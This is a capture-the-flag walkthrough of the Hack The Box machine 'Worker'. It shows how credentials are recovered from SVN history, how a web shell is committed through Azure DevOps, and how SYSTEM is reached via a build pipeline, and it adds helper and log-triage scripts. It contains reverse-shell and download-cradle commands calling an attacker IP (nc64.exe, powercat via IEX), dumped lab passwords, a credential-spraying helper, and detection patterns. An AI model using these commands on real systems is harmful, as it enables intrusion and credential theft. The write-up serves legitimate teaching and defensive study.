Hack-The-Box-walkthrough[worker]

Introduction

OS: Windows
Difficulty: Medium
Points: 30
Release: 15 Aug 2020
IP: 10.10.10.203

User Blood haqpl 00 days, 01 hours, 29 mins, 58 seconds.
Root Blood qtc 00 days, 03 hours, 10 mins, 42 seconds.


information gathering

First, run nmap as usual:

root@kali:~# nmap -sV -v -p- --min-rate=10000 10.10.10.203
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

web

Then browse to the following URL:

http://10.10.10.203/

It only shows the default IIS welcome page, so nothing to work with yet.

svnserve Subversion

Searching around, I found the following reference:

  • SVN Commands Cheat Sheet

With that cheat sheet we can enumerate the service. Start by listing the repository root:

root@kali:~# svn list svn://10.10.10.203
dimension.worker.htb/
moved.txt

Time to download those files:

root@kali:~/hackthebox/machine/worker# svn export svn://10.10.10.203/moved.txt
A moved.txt
Export complete.
root@kali:~/hackthebox/machine/worker# ls
moved.txt
root@kali:~/hackthebox/machine/worker# cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

That is a new hostname, so add it to /etc/hosts as well:

http://devops.worker.htb

Looking at the dimension.worker.htb page (the site in the repository), we find a lot more subdomains:

http://alpha.worker.htb/
http://cartoon.worker.htb/
http://lens.worker.htb/
http://solid-state.worker.htb/
http://spectral.worker.htb/
http://story.worker.htb/

I added them all to /etc/hosts too, but found nothing useful on them for now. devops.worker.htb, on the other hand, asks for credentials.

Back to the svn service: a repository normally carries history, so let's check whether there are earlier revisions here:

root@kali:~# svn info svn://10.10.10.203
Path: .
URL: svn://10.10.10.203
Relative URL: ^/
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020)

HEAD is revision 5, so there are four earlier revisions to look at, and the last-changed author gives us a potential username: nathen.
Let's get more detail on those revisions:

root@kali:~# svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------

The interesting one is r2, "Added deployment script", because no deployment script exists in HEAD any more. Export that revision. (Note: the --force flag I typed got mangled into an en dash, so svn took –force as the export destination path; that is why every file lands under a directory called –force/.)

root@kali:~/hackthebox/machine/worker# svn export -r 2 svn://10.10.10.203 –force
A –force
A –force/deploy.ps1
A –force/dimension.worker.htb
A –force/dimension.worker.htb/LICENSE.txt
A –force/dimension.worker.htb/README.txt
A –force/dimension.worker.htb/assets
A –force/dimension.worker.htb/assets/css
A –force/dimension.worker.htb/assets/css/fontawesome-all.min.css
A –force/dimension.worker.htb/assets/css/main.css
A –force/dimension.worker.htb/assets/css/noscript.css
A –force/dimension.worker.htb/assets/js
A –force/dimension.worker.htb/assets/js/breakpoints.min.js
A –force/dimension.worker.htb/assets/js/browser.min.js
A –force/dimension.worker.htb/assets/js/jquery.min.js
A –force/dimension.worker.htb/assets/js/main.js
A –force/dimension.worker.htb/assets/js/util.js
A –force/dimension.worker.htb/assets/sass
A –force/dimension.worker.htb/assets/sass/base
A –force/dimension.worker.htb/assets/sass/base/_page.scss
A –force/dimension.worker.htb/assets/sass/base/_reset.scss
A –force/dimension.worker.htb/assets/sass/base/_typography.scss
A –force/dimension.worker.htb/assets/sass/components
A –force/dimension.worker.htb/assets/sass/components/_actions.scss
A –force/dimension.worker.htb/assets/sass/components/_box.scss
A –force/dimension.worker.htb/assets/sass/components/_button.scss
A –force/dimension.worker.htb/assets/sass/components/_form.scss
A –force/dimension.worker.htb/assets/sass/components/_icon.scss
A –force/dimension.worker.htb/assets/sass/components/_icons.scss
A –force/dimension.worker.htb/assets/sass/components/_image.scss
A –force/dimension.worker.htb/assets/sass/components/_list.scss
A –force/dimension.worker.htb/assets/sass/components/_table.scss
A –force/dimension.worker.htb/assets/sass/layout
A –force/dimension.worker.htb/assets/sass/layout/_bg.scss
A –force/dimension.worker.htb/assets/sass/layout/_footer.scss
A –force/dimension.worker.htb/assets/sass/layout/_header.scss
A –force/dimension.worker.htb/assets/sass/layout/_main.scss
A –force/dimension.worker.htb/assets/sass/layout/_wrapper.scss
A –force/dimension.worker.htb/assets/sass/libs
A –force/dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A –force/dimension.worker.htb/assets/sass/libs/_functions.scss
A –force/dimension.worker.htb/assets/sass/libs/_mixins.scss
A –force/dimension.worker.htb/assets/sass/libs/_vars.scss
A –force/dimension.worker.htb/assets/sass/libs/_vendor.scss
A –force/dimension.worker.htb/assets/sass/main.scss
A –force/dimension.worker.htb/assets/sass/noscript.scss
A –force/dimension.worker.htb/assets/webfonts
A –force/dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A –force/dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A –force/dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A –force/dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A –force/dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A –force/dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A –force/dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A –force/dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A –force/dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A –force/dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A –force/dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A –force/dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A –force/dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A –force/dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A –force/dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A –force/dimension.worker.htb/images
A –force/dimension.worker.htb/images/bg.jpg
A –force/dimension.worker.htb/images/overlay.png
A –force/dimension.worker.htb/images/pic01.jpg
A –force/dimension.worker.htb/images/pic02.jpg
A –force/dimension.worker.htb/images/pic03.jpg
A –force/dimension.worker.htb/index.html

Looking at deploy.ps1, we find credentials in clear text:

root@kali:~/hackthebox/machine/worker/–force# cat deploy.ps1 
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
  • username: nathen

  • password: wendel98
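The deploy script only existed in an old revision; a later commit scrubbed it from HEAD, which is exactly the situation where a secret is gone from the working copy but still recoverable from history. As an added example (my own code, not part of the original writeup or of the box), the script below models what one svn export -r N per revision gives you, a dict of path to file text, and reports every credential-looking assignment together with the revision range it existed in, flagging the ones that are absent at HEAD. The deploy.ps1 text is the one recovered above; the other snapshots, including the assumption that r3 still carried the script and r4 removed it, are constructed for the example.

```python
import re
from typing import Dict, List

# Credential-looking assignments in PowerShell, shell or INI syntax.
# The value must be the rest of the line (optionally quoted), so
# '$pwd = ($plain | ConvertTo-SecureString)' is not reported but '$plain = "wendel98"' is.
SECRET_RE = re.compile(
    r'^\s*\$?(?P<name>\w*(?:pass|pwd|plain|secret|token)\w*)\s*[:=]\s*'
    r'["\']?(?P<value>[^"\'\s()|]+)["\']?\s*$', re.IGNORECASE)
# Companion username assignment in the same file, attached to each finding as a hint.
USER_RE = re.compile(
    r'^\s*\$?(?P<name>\w*(?:user|login|account)\w*)\s*[:=]\s*'
    r'["\']?(?P<value>[^"\'\s()|]+)["\']?\s*$', re.IGNORECASE)


def find_secrets(text: str) -> List[Dict[str, str]]:
    """Return credential-looking assignments found in one file's text."""
    user_hint = None
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m and user_hint is None:
            user_hint = m.group("value")
        m = SECRET_RE.match(line)
        if m:
            hits.append({"name": m.group("name"), "value": m.group("value")})
    for h in hits:
        h["user_hint"] = user_hint
    return hits


def scan_history(snapshots: Dict[int, Dict[str, str]]) -> List[Dict]:
    """snapshots maps revision number -> {path: file text}, one export per revision.

    Returns one finding per (path, name, value) with the first and last revision
    it appeared in, and whether it is already gone at HEAD (the highest revision).
    """
    if not snapshots:
        return []
    head = max(snapshots)
    findings: Dict[tuple, Dict] = {}
    for rev in sorted(snapshots):
        for path, text in snapshots[rev].items():
            for hit in find_secrets(text):
                key = (path, hit["name"], hit["value"])
                f = findings.setdefault(key, {"path": path, **hit,
                                              "first_rev": rev, "last_rev": rev})
                f["last_rev"] = rev
    for f in findings.values():
        f["scrubbed_at_head"] = f["last_rev"] < head
    return sorted(findings.values(), key=lambda f: (f["path"], f["first_rev"]))


# deploy.ps1 as recovered from revision 2 on the box.
DEPLOY_PS1_R2 = '''$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
'''
INDEX_HTML = "<html><body>Dimension</body></html>"  # constructed stand-in for the site files

# Constructed history: r2 adds the script, r3 keeps it, r4 removes it, r5 adds moved.txt.
SAMPLE_SNAPSHOTS = {
    1: {"dimension.worker.htb/index.html": INDEX_HTML},
    2: {"dimension.worker.htb/index.html": INDEX_HTML, "deploy.ps1": DEPLOY_PS1_R2},
    3: {"dimension.worker.htb/index.html": INDEX_HTML, "deploy.ps1": DEPLOY_PS1_R2},
    4: {"dimension.worker.htb/index.html": INDEX_HTML},
    5: {"dimension.worker.htb/index.html": INDEX_HTML,
        "moved.txt": "This repository has been migrated and will no longer be maintaned here.\n"},
}

if __name__ == "__main__":
    for f in scan_history(SAMPLE_SNAPSHOTS):
        print(f"{f['path']}: {f['name']} = {f['value']!r} (user hint: {f['user_hint']}) "
              f"r{f['first_rev']}..r{f['last_rev']}"
              + (" -- gone at HEAD, still in history" if f["scrubbed_at_head"] else ""))
```

In practice you would feed it the output of svn export -r N for every N from 1 to HEAD; the point of the scrubbed_at_head flag is that a secret removed in a later commit is still one svn export away.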

The only place we can try these credentials for now is the Azure DevOps login at

http://devops.worker.htb/

and they work: we are logged in as nathen.

It turns out that from here we can edit all of the sites we discovered earlier on the dimension page, and the DevOps server deploys them for us.

Since the sites are served by IIS, committing an ASP or ASPX web shell should give us code execution. I used the cmdasp.aspx web shell to get a foothold:

  • First, create a new branch:

Go to Repos, open the SmartHotel360 repository and switch to one of the site branches, e.g. alpha. Each branch corresponds to one of the subdomains from the dimension page, so pick the branch of the site you will browse to afterwards (the remaining subdomains are a rabbit hole). Below I use spectral.

  • Upload the aspx shell to that branch.

  • Create a new pull request.

  • Approve and complete the pull request.

Once the pull request is completed, the deployment picks up the branch and our shell lands on the matching site.

Add spectral.worker.htb to /etc/hosts and visit:

http://spectral.worker.htb/cmdasp.aspx

Our web shell is now available. Let's turn it into a reverse shell. On the web shell, create a working directory:

mkdir C:\temp

then download nc64.exe from the attack machine:

powershell -command Invoke-WebRequest -Uri http://10.10.14.5:8001/nc64.exe -Outfile C:\temp\nc64.exe

and connect back:

C:\temp\nc64.exe 10.10.14.5 4445 -e powershell.exe

Before running those two commands, prepare the attack machine: copy nc64.exe into the worker directory and serve it (this is Python 2; on Python 3 use python3 -m http.server 8001):

python -m SimpleHTTPServer 8001

and in another terminal start the listener:

nc -lvp 4445

Now we are connected as iis apppool\defaultapppool:

root@kali:~# nc -lvp 4445
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.10.203.
Ncat: Connection from 10.10.10.203:50819.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool

After running WinPEAS, we discover there is a W:\ drive.
Enumerating it turns up the svnserve password file for the repository we looked at earlier, W:\svnrepos\www\conf\passwd:

PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
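The svnserve passwd format is plain INI: a [users] section with one user = password per line, and nothing stops an admin from listing the same user twice (nichin has two passwords above). As an added example, not part of the original writeup, here is the parse-and-match step as a script: it reads the file, keeps duplicate entries rather than failing on them (Python's configparser in its default strict mode raises on the duplicate key), and keeps only the entries whose username also exists as a local account, which is the short list worth trying over WinRM. The passwd excerpt is abridged from the file above; the list of local users is constructed for the example, standing in for a listing of C:\Users.

```python
from typing import Iterable, List, Tuple


def parse_svnserve_passwd(text: str) -> List[Tuple[str, str]]:
    """Parse the [users] section of an svnserve passwd file.

    Returns (user, password) pairs in file order. Lines starting with '#' are
    comments; other sections are ignored. Duplicates are kept, since the same
    user may be listed twice and both passwords are worth a try.
    """
    pairs: List[Tuple[str, str]] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "users" or "=" not in line:
            continue
        user, password = (part.strip() for part in line.split("=", 1))
        if user and password:
            pairs.append((user, password))
    return pairs


def spray_candidates(pairs: Iterable[Tuple[str, str]],
                     local_users: Iterable[str]) -> List[Tuple[str, str]]:
    """Keep only entries whose username matches a local account (case-insensitive),
    dropping exact duplicate (user, password) pairs while preserving file order."""
    local = {u.lower() for u in local_users}
    seen = set()
    out: List[Tuple[str, str]] = []
    for user, password in pairs:
        key = (user.lower(), password)
        if user.lower() in local and key not in seen:
            seen.add(key)
            out.append((user, password))
    return out


# Abridged copy of W:\svnrepos\www\conf\passwd from the box (comments as in the file).
PASSWD_EXCERPT = """### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
robish = onesare
robisl = wolves11
robive = andwhich
sarkil = friday
"""

# Constructed stand-in for the directory names under C:\Users on the target.
LOCAL_USERS = ["Administrator", "Default", "Public", "robisl"]

if __name__ == "__main__":
    creds = parse_svnserve_passwd(PASSWD_EXCERPT)
    print(f"{len(creds)} entries in passwd")
    for user, password in spray_candidates(creds, LOCAL_USERS):
        print(f"try: evil-winrm -i 10.10.10.203 -u {user} -p {password}")
```

The same list, without the local-user filter, is also a ready-made username list for spraying against other services (WinRM, SMB, the DevOps login), since people reuse passwords across them.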

Looking at C:\Users\ we see that robisl is a local user on the box, so that is the entry to try first. The password wolves11 works over WinRM (port 5985 from the nmap scan), and we get user:

root@kali:~# evil-winrm -i 10.10.10.203 -u robisl -p wolves11

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls


Directory: C:\Users\robisl\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/18/2020 5:47 PM 34 user.txt


*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
8a5171122e56ad7a77aabbc239f14892

get root

After some enumeration I could not find a way to escalate from robisl on the host itself (maybe there is one, but I found nothing useful).

So back to devops.worker.htb: I tried to log in as robisl with wolves11 as the password.

We are in!

The repository is not the same as nathen's, and there is nothing really useful inside it (no stored passwords, etc.).

  • But we do have permission to create pipelines.

Create a basic project.

Go to Pipelines, start a new one, choose Azure Repos Git as the source, and select the default repository offered (partunlimited).

Then pick "Starter pipeline" from the template list.

The pipeline config is a YAML file, and its script step lets us run arbitrary commands on the build agent. Let's see who we are:

  • Replace echo Hello, world with whoami.

And remove the line:

pool: 'Default'

because in my run the build failed with it in place (no agent was available under that pool name), and a failed build gives us no code execution.

Now press Save and run and wait for the build to finish.

Looking at the script log for the step, we see who the agent runs our commands as:

##[section]Starting: Run a one-line script
==============================================================================
Task : Command line
Description : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
Version : 2.151.1
Author : Microsoft Corporation
Help : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
==============================================================================
Generating script.
Script contents:
whoami
========================== Starting Command Output ===========================
##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\b1a4ec90-9e94-4e5f-9074-a565cefb9956.cmd""
nt authority\system
##[section]Finishing: Run a one-line script

We have code execution as NT AUTHORITY\SYSTEM, the Windows equivalent of root!

Create another pipeline (or edit this one) and change the script command to

type C:\Users\Administrator\Desktop\root.txt

and we get the root flag:

##[section]Starting: Run a one-line script
==============================================================================
Task : Command line
Description : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows
Version : 2.151.1
Author : Microsoft Corporation
Help : https://docs.microsoft.com/azure/devops/pipelines/tasks/utility/command-line
==============================================================================
Generating script.
Script contents:
type C:\Users\Administrator\Desktop\root.txt
========================== Starting Command Output ===========================
##[command]"C:\Windows\system32\cmd.exe" /D /E:ON /V:OFF /S /C "CALL "w:\agents\agent11\_work\_temp\389e4fa6-cf26-41d6-9dc5-7d09979f7b00.cmd""
43ebb4cb30276f0c2e77511c1d5b69d4
##[section]Finishing: Run a one-line script
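Every command a pipeline step runs is written to the job log in clear, so the defender's side of this is cheap: parse the Command line task's "Script contents:" block and alert on recon, credential or flag reads and download cradles. As an added example (my own code, not part of the original writeup), the script below splits an Azure Pipelines job log into its Command line tasks, records the script each one ran, the agent-side .cmd path from the ##[command] line and the output, and tags suspicious scripts. The sample log is constructed in the layout of the logs above (the two tasks from this writeup plus a powercat cradle); the keyword lists are an assumption for the example, not an official ruleset.

```python
import re
from typing import Dict, List

# What to flag inside a pipeline script step. Keyword lists are an assumption
# for this example, not a complete ruleset.
SUSPICIOUS = [
    ("recon", re.compile(r"\b(whoami|hostname|ipconfig|net user)\b", re.I)),
    ("secret/flag read", re.compile(r"\b(type|cat|Get-Content|gc)\b.*\\(Administrator|Users)\\", re.I)),
    ("download cradle", re.compile(
        r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX|Invoke-Expression|certutil)\b", re.I)),
    ("reverse shell tool", re.compile(r"\b(powercat|nc64|ncat|nc\.exe|mimikatz)\b", re.I)),
]


def extract_tasks(log: str) -> List[Dict]:
    """Split a job log into Command line tasks.

    Each task dict has: task (display name), script (lines between 'Script contents:'
    and the command-output banner), agent_cmd (the .cmd file the agent wrote, taken
    from the ##[command] line) and output (lines up to the Finishing marker).
    """
    tasks: List[Dict] = []
    cur = None
    mode = None
    for line in log.splitlines():
        if line.startswith("##[section]Starting: "):
            cur = {"task": line.split(": ", 1)[1], "script": [], "agent_cmd": None, "output": []}
            mode = None
        elif cur is None:
            continue
        elif line.startswith("##[section]Finishing: "):
            tasks.append(cur)
            cur = None
        elif line.strip() == "Script contents:":
            mode = "script"
        elif line.startswith("=") and "Starting Command Output" in line:
            mode = "output"
        elif line.startswith("##[command]"):
            m = re.search(r'CALL "([^"]+)"', line)
            cur["agent_cmd"] = m.group(1) if m else line[len("##[command]"):]
        elif mode == "script":
            cur["script"].append(line)
        elif mode == "output":
            cur["output"].append(line)
    return tasks


def triage(log: str) -> List[Dict]:
    """Tag each task's script with the suspicious categories it matches."""
    results = []
    for t in extract_tasks(log):
        script_text = "\n".join(t["script"])
        tags = sorted(tag for tag, rx in SUSPICIOUS if rx.search(script_text))
        results.append({**t, "tags": tags,
                        "output_shows_system": any("nt authority\\system" in o.lower()
                                                   for o in t["output"])})
    return results


def _task_log(script: str, guid: str, output: str) -> str:
    """Constructed Command line task log in the layout seen in the writeup."""
    return (
        "##[section]Starting: Run a one-line script\n"
        "==============================================================================\n"
        "Task         : Command line\n"
        "Description  : Run a command line script using Bash on Linux and macOS and cmd.exe on Windows\n"
        "Version      : 2.151.1\n"
        "Author       : Microsoft Corporation\n"
        "==============================================================================\n"
        "Generating script.\n"
        "Script contents:\n"
        f"{script}\n"
        "========================== Starting Command Output ===========================\n"
        '##[command]"C:\\Windows\\system32\\cmd.exe" /D /E:ON /V:OFF /S /C '
        f'"CALL "w:\\agents\\agent11\\_work\\_temp\\{guid}.cmd""\n'
        f"{output}\n"
        "##[section]Finishing: Run a one-line script\n"
    )


POWERCAT = ("powershell.exe -c \"IEX(New-Object System.Net.WebClient)"
            ".DownloadString('http://10.10.14.5/powercat.ps1');"
            "powercat -c 10.10.14.5 -p 3344 -e cmd\"")
SAMPLE_LOG = (
    _task_log("whoami", "b1a4ec90-9e94-4e5f-9074-a565cefb9956", "nt authority\\system")
    + _task_log("type C:\\Users\\Administrator\\Desktop\\root.txt",
                "389e4fa6-cf26-41d6-9dc5-7d09979f7b00", "<flag redacted>")
    + _task_log(POWERCAT, "0f0f0f0f-0000-4000-8000-000000000000", "")
)

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(f"{r['task']}: tags={r['tags']} system={r['output_shows_system']} cmd={r['agent_cmd']}")
```

The agent_cmd path (w:\agents\agent11\_work\_temp\<guid>.cmd) is also the artefact to collect on the agent host during an incident, since it is the exact script the attacker ran.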

This is a CTF, so we could stop here.

If you want an interactive session instead, make the pipeline script a reverse shell, for example with powercat:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/powercat.ps1');powercat -c 10.10.14.5 -p 3344 -e cmd"
  • powercat github download

On the attack machine, serve powercat.ps1 (Python 2; on Python 3 use python3 -m http.server 80):

python -m SimpleHTTPServer 80

start a listener on port 3344, then run the pipeline and the agent connects back with a SYSTEM shell.

Summary of knowledge

  • enumerating an svn service (svn list / info / log / export -r)
  • credential disclosure in repository history
  • Azure DevOps: commit a web shell to a deployed branch to get a shell
  • downloading files with PowerShell (Invoke-WebRequest)
  • WinPEAS usage
  • Azure DevOps: create a pipeline to get command execution as SYSTEM

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…